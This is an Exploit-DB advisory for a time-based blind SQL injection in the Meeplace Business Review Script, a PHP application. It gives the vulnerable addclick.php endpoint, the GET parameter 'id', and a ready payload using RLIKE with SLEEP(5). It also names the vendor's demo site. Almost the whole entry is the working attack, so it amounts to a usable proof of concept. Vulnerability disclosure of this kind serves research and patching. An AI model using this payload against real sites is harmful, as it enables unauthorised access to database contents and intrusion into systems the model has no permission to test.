Meeplace Business Review Script - 'id' SQL Injection

EDB-ID:

46592

CVE:

N/A




Platform:

PHP

Date:

2019-03-22


# Exploit Title: Meeplace Business Review Script - 'id' SQL Injection
# Date: 22.03.2019
# Dork:
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.meeplace.com
# Demo Site: http://demo.meeplace.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

# Request: http://localhost/[PATH]/ad/addclick.php?&id=1
# Vulnerable Parameter: id (GET)
# Payload: &id=1 RLIKE (SELECT * FROM (SELECT(SLEEP(5)))qcFZ)